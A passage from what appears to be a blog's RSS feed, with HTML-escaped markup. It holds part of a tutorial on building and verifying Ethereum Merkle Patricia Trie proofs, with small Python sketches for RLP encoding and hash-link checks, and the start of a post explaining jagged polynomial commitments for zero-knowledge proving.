&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;key = bytes.fromhex(&amp;quot;20616b6c64&amp;quot;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;value = bytes.fromhex(&amp;quot;01&amp;quot;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;encoded = rlp.encode([key, value])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;print(encoded.hex())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This should output this hex: &lt;code&gt;c78520616b6c6401&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
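&lt;p&gt;If you prefer not to depend on the &lt;code&gt;rlp&lt;&#x2F;code&gt; package, the subset of RLP needed for these short nodes fits in a few lines. This is a simplified sketch of the encoding rules, not a full implementation (it only handles byte strings and lists):&lt;&#x2F;p&gt;

```python
def rlp_encode(item):
    """Minimal RLP encoder covering byte strings and (nested) lists, which is
    all the trie nodes in this example need."""
    if isinstance(item, bytes):
        if len(item) == 1 and item[0] in range(0x80):
            return item                      # a single small byte encodes as itself
        return _length_prefix(len(item), 0x80) + item
    payload = b"".join(rlp_encode(x) for x in item)
    return _length_prefix(len(payload), 0xc0) + payload

def _length_prefix(length, offset):
    if length in range(56):                  # short item: one prefix byte
        return bytes([offset + length])
    length_bytes = length.to_bytes((length.bit_length() + 7) // 8, "big")
    return bytes([offset + 55 + len(length_bytes)]) + length_bytes
```

&lt;p&gt;Calling it on the two-item array from step 1 reproduces the hex &lt;code&gt;c78520616b6c6401&lt;&#x2F;code&gt; above.&lt;&#x2F;p&gt;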
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Hash the RLP encoding** using Keccak-256 to get the pointer of this node. You can use an [online hasher](https:&#x2F;&#x2F;emn178.github.io&#x2F;online-tools&#x2F;keccak_256.html) or this script:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;from eth_utils import keccak&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;rlp_bytes = bytes.fromhex(&amp;quot;c78520616b6c6401&amp;quot;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;hash_pointer = keccak(rlp_bytes)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;print(hash_pointer.hex())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This should output:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;4e2d0fbe6726eac15c5ecf49a4e1f947aa50e0531f4f3e98b8e1577ba52e1783&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The resulting MPT should look like this:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;BJ7XSE1mex.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Add the second key-value pair: `(0x616b6c65, 0x02)`. Since this key shares the first 7 digits with the previous one, we proceed in the following way:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Build one leaf for each key:** In each leaf, the array&amp;#39;s first element should be the remaining path, but since the two keys share every digit except the last one, the remaining path is empty. So, we should just write there the flag `20` indicating that we are in a leaf node and that the path has an even number of digits (zero digits). After that, encode the arrays in RLP and hash the RLP encodings, as we did in step 1.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Build a branch node:** Create a 17-item array. Write the hash of the first key&amp;#39;s leaf node at index $4$ and the hash of the second key&amp;#39;s leaf node at index $5$. Encode the array in RLP and hash the encoding.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Build the extension and root node:** Create a two-item array that contains the shared prefix as first element and the hash of the previously built branch node as second element. Since the shared prefix has an odd number of digits, add the flag `1` to it. Encode the array in RLP and hash the encoding.  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;BJaRZEJQll.png&quot; alt=&quot;image&quot; &#x2F;&gt;
3. Add the key-value pair &lt;code&gt;(0x616b6c78, 0x03)&lt;&#x2F;code&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Add a leaf node:** Notice that in this case, since the new key shares with the previous ones all the digits except the last two, the array&amp;#39;s first item will have just one digit as remaining path and the flag `3` indicating that it is a leaf node with an odd amount of path digits.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Add a branch node:** Its array should contain at index $6$ the hash pointer of the branch node built in step 2, and at index $7$ the hash pointer of the new leaf node we recently added.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Add an extension node:** The root will be another extension node. Its array should contain the shared prefix as first element and the hash of the recently added branch node as second element. Since the shared prefix has an even number of digits, add the flag `00` to it.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The current trie should look like this:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;HJrfJHJXee.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Add the last two key-value pairs continuing in this way, following the same steps as we did for the previous keys. When you&amp;#39;re done, you should have the following MPT:  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;Skc3rByXee.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;trie-proof&quot;&gt;Trie Proof&lt;&#x2F;h2&gt;
&lt;p&gt;Let’s now understand what a proof looks like in an MPT. Continuing with the previous example, let’s say we want to prove that the key-value pair &lt;code&gt;(0x616b6d31, 0x04)&lt;&#x2F;code&gt; belongs to our State Trie. How do we build the proof?&lt;&#x2F;p&gt;
&lt;p&gt;The proof will consist of the &lt;strong&gt;StateRoot&lt;&#x2F;strong&gt; &lt;code&gt;0x13ea...bed7&lt;&#x2F;code&gt; (the hash of the root node) along with a path that starts at the root and traverses the trie downward, following every digit of the target key until it reaches its leaf. Let’s go step by step to see how we build this path:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The first element of the path is the RLP of the root node: `0xf851...8080`.  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If we decode this RLP, we find that the root is a branch node. The array it represents has all empty slots except at indices 3 and 6 (because all the keys start with the digit &lt;code&gt;3&lt;&#x2F;code&gt; or &lt;code&gt;6&lt;&#x2F;code&gt;). This means that the root node branches into two child nodes. Since the first digit of the key we’re looking for is &lt;code&gt;6&lt;&#x2F;code&gt;, we need to look at the hash stored in the array at index 6 and move to that node.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. We move to the next node and store its RLP content as the second element of the path: `0xe583...67e9`.  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This node is an extension node because all keys starting with 6 share the same next four digits: &lt;code&gt;16b6&lt;&#x2F;code&gt;. To determine where to go next, we decode the RLP and get a two-item array. The second item gives us the hash of the next node we need to access.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Again, we move to the next node and store its RLP content as the third element of the path: `0xf851...8080`.  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This node is a branch node. Since our key continues with the digit &lt;code&gt;d&lt;&#x2F;code&gt;, we need to look at the hash stored in this node’s array at index $d$ and move to the node that this hash points to.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Finally, we reach the leaf node: `0xc482203104`. We store the RLP content of this final node, and with that, the proof is complete.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Then the proof for the key-value &lt;code&gt;(0x616b6d31, 0x04)&lt;&#x2F;code&gt; should look like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;state_root = 0x13ea549e268b5aa80e9752c6be0770cffba34d2b1aa1f858cb90f3f13ac3bed7&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;proof_path = &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    0xf851808080a0a26b2ac124718443aeed68fa0309225d0c8dd9dbee45685909e92fb594e1a4638080a02ccd118c9470c051689543b233ab109ad74d2fb4f57eb429c4d43294d6ae686780808080808080808080,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    0xe5831616b6a0917fa5cab26d915e2a89a263a578fa5f9ecf02cc0b1d3eeb433e7f32499267e9,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    0xf851808080808080808080808080a0cc97f12ea3217345e666974cd81b117ca02404f19c15d31158ac1d1e55398706a0822a55ca308aa885ad385d5e61aabaca54c2e4361eb03b6f851668c0f095ab77808080,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    0xc482203104&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;verify&quot;&gt;Verify&lt;&#x2F;h2&gt;
&lt;p&gt;If a verifier receives the StateRoot and the proof path for a certain key, how do they verify that the proof is valid?&lt;&#x2F;p&gt;
&lt;p&gt;A key distinction from standard Merkle Trees is the verification direction. While a typical Merkle proof is verified from the bottom up (from the leaf to the root), a Merkle Patricia Trie proof is verified from the top down. The process starts at the &lt;code&gt;StateRoot&lt;&#x2F;code&gt; and traverses the trie downwards, node by node, using the provided path to eventually reach the target leaf.&lt;&#x2F;p&gt;
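&lt;p&gt;A highly simplified sketch of this top-down traversal follows. This is our own illustration: it only checks the hash linkage between consecutive path elements, uses sha256 in place of Keccak-256, and skips the RLP decoding and nibble matching that a real verifier performs.&lt;&#x2F;p&gt;

```python
import hashlib

def verify_path(state_root_hex, proof_path_hex, hash_hex=None):
    """Top-down linkage check only (a sketch, not full MPT verification):
    the first node must hash to the state root, and each later node's hash
    must appear inside its parent's bytes, where the parent stores it as a
    child pointer. Full verification also RLP-decodes every node and follows
    the key's nibbles. sha256 stands in for Keccak-256 here."""
    if hash_hex is None:
        hash_hex = lambda b: hashlib.sha256(b).hexdigest()
    nodes = [bytes.fromhex(h) for h in proof_path_hex]
    if hash_hex(nodes[0]) != state_root_hex:
        return False                         # root node does not match the commitment
    for parent, child in zip(nodes, nodes[1:]):
        if bytes.fromhex(hash_hex(child)) not in parent:
            return False                     # broken hash link between levels
    return True
```

&lt;p&gt;Because each node embeds the hash of its children, tampering with any element of the path breaks the chain back to the trusted root.&lt;&#x2F;p&gt;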
&lt;p&gt;Let’s say the verifier receives the proof above for the key-value &lt;code&gt;(0x616b6d31, 0x04)&lt;&#x2F;code&gt;. Then, they have to follow these steps:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. [Hash](https:&#x2F;&#x2F;emn178.github.io&#x2F;online-tools&#x2F;keccak_256.html) the first element of the path and check that it matches the given **StateRoot**. Indeed:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;keccak(bytes.fromhex(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;quot;f851808080a0a26b2ac124718443aeed68fa0309225d0c8dd9dbee45685909e92fb594e1a4638080a02ccd118c9470c051689543b233ab109ad74d2fb4f57eb429c4d43294d6ae686780808080808080808080&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;)).hex() ==&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;quot;13ea549e268b5aa80e9752c6be0770cffba34d2b1aa1f858cb90f3f13ac3bed7&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. [Decode](https:&#x2F;&#x2F;toolkit.abdk.consulting&#x2F;ethereum#rlp) the **first RLP element** of the path and verify that index $6$ holds the hash of the second path element. Indeed:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;rlp.decode(bytes.fromhex(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;quot;f851808080a0a26b2ac124718443aeed68fa0309225d0c8dd9dbee45685909e92fb594e1a4638080a02ccd118c9470c051689543b233ab109ad74d2fb4f57eb429c4d43294d6ae686780808080808080808080&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;))[6].hex() ==&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;quot;2ccd118c9470c051689543b233ab109ad74d2fb4f57eb429c4d43294d6ae6867&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Decode the **path&amp;#39;s second RLP element**. You&amp;#39;ll find a two-item array whose first element is `0x1616b6`. Since its first digit is `1`, we know that we are on an extension node. Check that the rest of the digits correspond to the key we are looking for. Verify the array&amp;#39;s second element is the hash of the path&amp;#39;s next element.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Decode the **third path element**. You&amp;#39;ll find a branch node. Verify that at index $d$ it stores the hash of the path&amp;#39;s next element.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Decode the **path&amp;#39;s last element**. You&amp;#39;ll find a two-item array whose first element is `0x2031`. Since its first two digits are `20`, we know that we have reached a leaf node. Verify that the first item contains the remaining key&amp;#39;s digits `31` and the second item contains the key&amp;#39;s value `0x04`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;The Merkle Patricia Trie is the backbone of Ethereum’s state management. It combines the key-navigation efficiency of tries with the cryptographic guarantees of Merkle trees. This structure allows Ethereum to store, verify, and revert state efficiently and securely. With the MPT, Ethereum nodes can independently execute transactions and verify consensus simply by comparing state roots, enabling a scalable and trustless blockchain system. In an upcoming post, we will show how to arithmetize the MPT update and prove that the inclusion proofs were verified.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Our Succinct explanation of jagged polynomial commitments</title>
          <pubDate>Fri, 06 Jun 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/our-succinct-explanation-of-jagged-polynomial-commitments/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/our-succinct-explanation-of-jagged-polynomial-commitments/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/our-succinct-explanation-of-jagged-polynomial-commitments/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;A few weeks ago, Succinct released their paper &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;succinctlabs&#x2F;hypercube-verifier&#x2F;blob&#x2F;main&#x2F;jagged-polynomial-commitments.pdf&quot;&gt;Jagged Polynomial Commitments&lt;&#x2F;a&gt; together with a verifier using the techniques described there, allowing them to prove Ethereum blocks in around 12 seconds and showing that real-time proving of the chain is possible. While this represents &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;x.com&#x2F;VitalikButerin&#x2F;status&#x2F;1925050155922862526&quot;&gt;the average case and energy consumption is still high&lt;&#x2F;a&gt;, it is a major step towards scaling Ethereum using ZK. The paper makes heavy use of multilinear polynomials and the sumcheck protocol, so we recommend reading our posts on &lt;a href=&quot;&#x2F;have-you-checked-your-sums&#x2F;&quot;&gt;sumcheck&lt;&#x2F;a&gt;, &lt;a href=&quot;&#x2F;gkr-protocol-a-step-by-step-example&#x2F;&quot;&gt;GKR&lt;&#x2F;a&gt; and &lt;a href=&quot;&#x2F;gkr-protocol-a-step-by-step-example&#x2F;&quot;&gt;Basefold&lt;&#x2F;a&gt; if you are unfamiliar with them. For more background on sparse commitments and their uses, see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2025&#x2F;105.pdf&quot;&gt;twist and shout&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1216.pdf&quot;&gt;Lasso&lt;&#x2F;a&gt;. For more background on read-once branching programs and their use in evaluating multilinear extensions, see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2018&#x2F;861.pdf&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;jagged-functions&quot;&gt;Jagged functions&lt;&#x2F;h2&gt;
&lt;p&gt;Typical arithmetization schemes consist of several tables (for example, one for the CPU, one for the ALU, another for memory, etc) and a set of algebraic constraints that have to be enforced over the table. Each column of the tables is encoded using univariate or multivariate polynomials and the prover then commits to these encodings (using a polynomial commitment scheme, PCS). In both cases, we require that the length of the columns is a power of 2, since this enables efficient encoding, either via the fast Fourier transform (FFT) or the multilinear Lagrange basis polynomials. This imposes several constraints:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. All columns in a table must have the same length&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. We need to pad the columns to ensure their length is equal to a power of 2.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This results in a lot of overhead, since we need to pad all columns to the same length and store a large number of dummy entries in the tables (for example, zero values). We would like to use some sparse representation of the data, that is, just storing all the non-dummy values. Moreover, we would like to compress everything into a single column to commit to just one encoding. This is precisely one of the main points of the paper, which finds a way to obtain a dense representation of the tables, without all the padding (note that we will need the column to have a length equal to a power of 2, and some padding might be necessary).&lt;&#x2F;p&gt;
&lt;p&gt;We will explain the idea behind the dense representation using one table, but the idea can be extended to several tables by adding an additional variable that keeps track of the table index and the number of columns each table has. Suppose we have a table which has 32 columns ($32 = 2^5$). For each column, we keep the length $l_k$ of each column, consisting of the non-dummy entries. For example, $l_0 = 2^{20}$, $l_1 = 2^{18} + 15$, $l_2 = 2^{16} + 1475$, and so on and so forth. The prover can construct a vector $t$ whose entries are the cumulative lengths of the columns. So, $t_0 = l_0$, $t_1 = l_0 + l_1$, $t_2 = l_0 + l_1 + l_2$. In summary,&lt;br &#x2F;&gt;
$t_0 = l_0$&lt;br &#x2F;&gt;
$t_{k + 1} = t_k + l_{k + 1}$&lt;br &#x2F;&gt;
Note that, since the $l_k$ are all positive, the vector $t$ has non-decreasing entries. We can merge all the columns into a single one by stacking them one below the other. Given an index $j$ into the vector of stacked columns, we can find where the original element was. First, we look for the smallest $k$ such that $j &amp;lt; t_k$. This $k$ gives the column where the element belongs. Then, we can compute the row as $i = j - t_{k - 1}$ (if $k = 0$, then $i = j$). This yields a one-to-one correspondence between the original table and the stacked columns (we will call this the dense representation from now on). The dense representation has length $2^m$, where $m = \lceil \log_2 \max{t} \rceil$. Given the procedure to find the row and column, we can define two functions,&lt;br &#x2F;&gt;
$\mathrm{col}(j) = \min \{ k : t_k &amp;gt; j \}$&lt;br &#x2F;&gt;
$\mathrm{row}(j) = j - t_{\mathrm{col}(j) - 1}$, with the convention $t_{-1} = 0$&lt;br &#x2F;&gt;
Using the letter $q$ to denote the multilinear encoding of the dense representation, we see that each entry corresponds to the non-dummy part of the multilinear extension of the whole table, $p$.&lt;br &#x2F;&gt;
$p(\mathrm{row}(j), \mathrm{col}(j)) = q(j)$.&lt;&#x2F;p&gt;
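&lt;p&gt;A small sketch of the stacking and of the $\mathrm{row}$ and $\mathrm{col}$ maps (our own illustration; the function names are made up):&lt;&#x2F;p&gt;

```python
import bisect

def stack_columns(columns):
    """Stack the non-dummy column entries into one dense vector and record
    the cumulative column lengths t."""
    t, dense, total = [], [], 0
    for column in columns:
        total += len(column)
        t.append(total)
        dense.extend(column)
    return dense, t

def col_of(j, t):
    # smallest k such that j is strictly below t[k]
    return bisect.bisect_right(t, j)

def row_of(j, t):
    k = col_of(j, t)
    return j if k == 0 else j - t[k - 1]
```

&lt;p&gt;For columns of lengths 3, 1 and 2, the cumulative vector is $t = (3, 4, 6)$, and every entry of the dense vector maps back to its original cell, matching the correspondence $p(\mathrm{row}(j), \mathrm{col}(j)) = q(j)$.&lt;&#x2F;p&gt;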
&lt;p&gt;This saves a lot of space to represent the whole table, at the expense of having the prover send the vector $t$. We can then show that if we want to evaluate $p(z_r , z_c)$ this is equivalent to,&lt;br &#x2F;&gt;
$p(z_r , z_c) = \sum p(x , y) \mathrm{eq} (x , z_r) \mathrm{eq} (y , z_c) = \sum q(i) \mathrm{eq}(\mathrm{row}(i) , z_r) \mathrm{eq}(\mathrm{col}(i) , z_c)$&lt;br &#x2F;&gt;
since any zero entry of $p(x,y)$ does not contribute to the sum.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;why-does-this-work-with-multilinear-polynomials&quot;&gt;Why does this work with multilinear polynomials?&lt;&#x2F;h2&gt;
&lt;p&gt;With multivariate polynomials, the sumcheck protocol reduces statements to the evaluation of the polynomial at a random point. For example, we can use it to show that the multivariate polynomial $g$ evaluates to zero over the hypercube using the zero-check,&lt;br &#x2F;&gt;
$$\sum \mathrm{eq}(r,x) g(x) = 0$$&lt;br &#x2F;&gt;
and, by interacting with the prover, the verifier is left to perform one evaluation at $z$ for $\mathrm{eq} (r,z) g(z)$, plus some simple checks involving univariate polynomials. Using a PCS, the prover can give the verifier access to $g$ and query for the evaluation at $z$ using the evaluation protocol of the PCS.&lt;&#x2F;p&gt;
&lt;p&gt;In the case of univariate polynomials, we show that $g(x)$ has zeros over a domain $D$ by quotienting with the zerofier&#x2F;vanishing polynomial over $D$, $Z_D (x)$. In general, if $D$ has a nice structure (for example, $D$ consists of the n-th roots of unity), the vanishing polynomial can be evaluated very efficiently (in our example, $Z_D (x) = x^n - 1$). In the case of sparse polynomials, the representation of $Z_D (x)$ may be complicated and thus not efficiently computable.&lt;&#x2F;p&gt;
&lt;p&gt;Thus, multilinear polynomials do not require computing quotients and you can work a priori on more general fields (FFTs, on the other hand, need smooth domains where $|F| - 1 = 2^n c$, where $n$ is typically at least $24$).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;how-to-handle-a-large-number-of-columns&quot;&gt;How to handle a large number of columns&lt;&#x2F;h2&gt;
&lt;p&gt;The paper offers two optimizations to deal with a large number of columns:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Fancy jagged: if all the columns in a table have the same height, we reduce the amount of information we need to pass to compute $t$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Commit to the column heights. The prover can include the column heights (prepending them to the table) in the table and commit to them.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;jagged-pcs&quot;&gt;Jagged PCS&lt;&#x2F;h2&gt;
&lt;p&gt;Another core part of the paper consists of developing a PCS for sparse&#x2F;jagged polynomials. Remember that, from the discussion above,&lt;br &#x2F;&gt;
$p(z_r , z_c) = \sum p(x , y) \mathrm{eq} (x , z_r) \mathrm{eq} (y , z_c) = \sum q(i) \mathrm{eq}(\mathrm{row}(i) , z_r) \mathrm{eq}(\mathrm{col}(i) , z_c)$&lt;br &#x2F;&gt;
We can find the multilinear extension of a function $f_t$ given by&lt;br &#x2F;&gt;
$f_t (x) = \mathrm{eq}(\mathrm{row}(x) , z_r) \mathrm{eq}(\mathrm{col}(x) , z_c)$&lt;br &#x2F;&gt;
